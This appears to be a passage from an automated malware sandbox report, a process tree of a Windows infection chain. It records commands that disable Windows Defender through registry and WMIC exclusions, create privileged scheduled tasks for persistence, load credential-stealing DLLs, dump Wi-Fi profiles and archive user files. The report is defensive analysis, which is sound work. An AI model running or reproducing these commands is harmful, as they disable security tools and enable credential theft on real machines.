        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        10⤵
        
        PID:8024
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        11⤵
        
        PID:9992
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        12⤵
        
        PID:7724
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        10⤵
        
        PID:10540
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        11⤵
        
        PID:11072
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        12⤵
        
        PID:11672
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        10⤵
        
        PID:11936
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        11⤵
        
        PID:12064
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        12⤵
        
        PID:11600
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        10⤵
        
        PID:4360
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        11⤵
        
        PID:6396
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        12⤵
        
        PID:6676
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        10⤵
        
        PID:6796
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        11⤵
        
        PID:6852
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2588
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        13⤵
        
        PID:772
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        9⤵
        
        PID:11648
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        10⤵
        
        PID:11920
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:12056
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        12⤵
        
        PID:11068
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 15:54:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSDE69.tmp\Install.exe\" it /rHTdidNNKz 385118 /S" /V1 /F
        9⤵
        Drops file in Windows directory
        Creates scheduled task(s)
        
        PID:12156
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
        9⤵
        
        PID:10900
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        10⤵
        
        PID:10728
        
        \??\c:\windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        11⤵
        
        PID:5684
    - - C:\Users\Admin\AppData\Local\Temp\1000079001\gold.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000079001\gold.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5212
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:5364
    - - C:\Users\Admin\AppData\Local\Temp\1000080001\alexxxxxxxx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000080001\alexxxxxxxx.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4524
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        Checks computer location settings
        
        PID:5996
        
        C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
        
        "C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5544
        
        C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
        
        "C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"
        7⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5540
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
        7⤵
        
        PID:4712
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /C Y /N /D Y /T 3
        8⤵
        
        PID:4708
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4524 -s 332
        6⤵
        Program crash
        
        PID:5708
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
        5⤵
        Loads dropped DLL
        
        PID:5988
      - C:\Windows\system32\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
        6⤵
        Blocklisted process makes network request
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        
        PID:6048
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        7⤵
        
        PID:5756
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\818691465304_Desktop.zip' -CompressionLevel Optimal
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1624
    - - C:\Users\Admin\AppData\Local\Temp\1000081001\install.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000081001\install.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Program Files directory
        
        PID:5040
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "
        6⤵
        
        PID:5748
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc stop GameServerClient
        7⤵
        Launches sc.exe
        
        PID:5908
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameServerClient confirm
        7⤵
        Executes dropped EXE
        
        PID:964
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc delete GameSyncLink
        7⤵
        Launches sc.exe
        
        PID:5704
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameSyncLink confirm
        7⤵
        Executes dropped EXE
        
        PID:5720
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
        7⤵
        Executes dropped EXE
        
        PID:5380
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService start GameSyncLink
        7⤵
        Executes dropped EXE
        
        PID:4016
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "
        6⤵
        
        PID:6464
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc stop GameServerClientC
        7⤵
        Launches sc.exe
        
        PID:6576
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameServerClientC confirm
        7⤵
        Executes dropped EXE
        
        PID:6608
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc delete PiercingNetLink
        7⤵
        Launches sc.exe
        
        PID:6864
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove PiercingNetLink confirm
        7⤵
        Executes dropped EXE
        
        PID:6928
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
        7⤵
        Executes dropped EXE
        
        PID:9796
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService start PiercingNetLink
        7⤵
        Executes dropped EXE
        
        PID:8064
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installm.bat" "
        6⤵
        
        PID:9564
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc delete GameSyncLinks
        7⤵
        Launches sc.exe
        
        PID:10196
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameSyncLinks confirm
        7⤵
        Executes dropped EXE
        
        PID:10940
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService install GameSyncLinks "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
        7⤵
        Executes dropped EXE
        
        PID:11984
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService start GameSyncLinks
        7⤵
        Executes dropped EXE
        
        PID:6632
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
        6⤵
        
        PID:7788
    - - C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:5396
      - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe" /F
        6⤵
        Creates scheduled task(s)
        
        PID:4800
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
        5⤵
        Blocklisted process makes network request
        Loads dropped DLL
        
        PID:7040
- - C:\Users\Admin\AppData\Local\Temp\1000020001\a011c71051.exe
    "C:\Users\Admin\AppData\Local\Temp\1000020001\a011c71051.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Accesses Microsoft Outlook profiles
    - Adds Run key to start application
    - Checks whether UAC is enabled
    - Checks processor information in registry
    PID:2856
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
      4⤵
      Creates scheduled task(s)
      PID:5272
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
      4⤵
      Creates scheduled task(s)
      PID:1376
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_ab414e7959b5772c8d538ffeee266027\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_ab414e7959b5772c8d538ffeee266027 HR" /sc HOURLY /rl HIGHEST
      4⤵
      Creates scheduled task(s)
      PID:7692
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_ab414e7959b5772c8d538ffeee266027\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_ab414e7959b5772c8d538ffeee266027 LG" /sc ONLOGON /rl HIGHEST
      4⤵
      Creates scheduled task(s)
      PID:8048
  - - C:\Users\Admin\AppData\Local\Temp\spanWjFctJ_0RlDJ\ujCPg5JME4_cYggpTWjO.exe
      "C:\Users\Admin\AppData\Local\Temp\spanWjFctJ_0RlDJ\ujCPg5JME4_cYggpTWjO.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Checks whether UAC is enabled
      PID:9864
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_38df83dfe9ed9bb5b7c2e2e32d8073da\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_38df83dfe9ed9bb5b7c2e2e32d8073da HR" /sc HOURLY /rl HIGHEST
      4⤵
      Creates scheduled task(s)
      PID:10120
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_38df83dfe9ed9bb5b7c2e2e32d8073da\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_38df83dfe9ed9bb5b7c2e2e32d8073da LG" /sc ONLOGON /rl HIGHEST
      4⤵
      Creates scheduled task(s)
      PID:10212
  - - C:\Users\Admin\AppData\Local\Temp\spanWjFctJ_0RlDJ\C8zbImAnLOG7qFppQxLC.exe
      "C:\Users\Admin\AppData\Local\Temp\spanWjFctJ_0RlDJ\C8zbImAnLOG7qFppQxLC.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:9560
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/account
        5⤵
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:8320
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9392746f8,0x7ff939274708,0x7ff939274718
        6⤵
        
        PID:8364
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,6488216981508646437,5044236541429220578,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2224 /prefetch:2
        6⤵
        
        PID:10064
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2196,6488216981508646437,5044236541429220578,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 /prefetch:3
        6⤵
        
        PID:9724
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2196,6488216981508646437,5044236541429220578,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2312 /prefetch:8
        6⤵
        
        PID:10220
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,6488216981508646437,5044236541429220578,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1
        6⤵
        
        PID:10268
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,6488216981508646437,5044236541429220578,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1
        6⤵
        
        PID:10276
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,6488216981508646437,5044236541429220578,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4592 /prefetch:1
        6⤵
        
        PID:11056
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,6488216981508646437,5044236541429220578,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4720 /prefetch:1
        6⤵
        
        PID:11212
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,6488216981508646437,5044236541429220578,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2192 /prefetch:1
        6⤵
        
        PID:11448
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,6488216981508646437,5044236541429220578,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5124 /prefetch:1
        6⤵
        
        PID:11488
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/video
        5⤵
        
        PID:10100
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9392746f8,0x7ff939274708,0x7ff939274718
        6⤵
        
        PID:9860
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,12331283171444117644,16317354177437647520,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2080 /prefetch:2
        6⤵
        
        PID:11048
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2068,12331283171444117644,16317354177437647520,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 /prefetch:3
        6⤵
        
        PID:11156
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
        5⤵
        
        PID:8072
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9392746f8,0x7ff939274708,0x7ff939274718
        6⤵
        
        PID:6432
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1436,8920101118028168445,15469865706668944921,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 /prefetch:3
        6⤵
        
        PID:10436
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_90631568f4eda919856d13dba2bc5770\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_90631568f4eda919856d13dba2bc5770 HR" /sc HOURLY /rl HIGHEST
      4⤵
      Creates scheduled task(s)
      PID:9968
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_90631568f4eda919856d13dba2bc5770\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_90631568f4eda919856d13dba2bc5770 LG" /sc ONLOGON /rl HIGHEST
      4⤵
      Creates scheduled task(s)
      PID:7664
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:10160
  - - C:\Users\Admin\AppData\Local\Temp\spanWjFctJ_0RlDJ\Sj8zUkhFMmmDjGfb0jdi.exe
      "C:\Users\Admin\AppData\Local\Temp\spanWjFctJ_0RlDJ\Sj8zUkhFMmmDjGfb0jdi.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Checks whether UAC is enabled
      PID:9944
- - C:\Users\Admin\1000021002\b6ebe28937.exe
    "C:\Users\Admin\1000021002\b6ebe28937.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:2848
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
      4⤵
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of WriteProcessMemory
      PID:4860
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff94c8acc40,0x7ff94c8acc4c,0x7ff94c8acc58
        5⤵
        
        PID:4612
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1852,i,14742667700397869648,3714751180310307217,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=1848 /prefetch:2
        5⤵
        
        PID:4316
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2076,i,14742667700397869648,3714751180310307217,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=2128 /prefetch:3
        5⤵
        
        PID:4484
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2240,i,14742667700397869648,3714751180310307217,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=2560 /prefetch:8
        5⤵
        
        PID:2720
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3104,i,14742667700397869648,3714751180310307217,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=3168 /prefetch:1
        5⤵
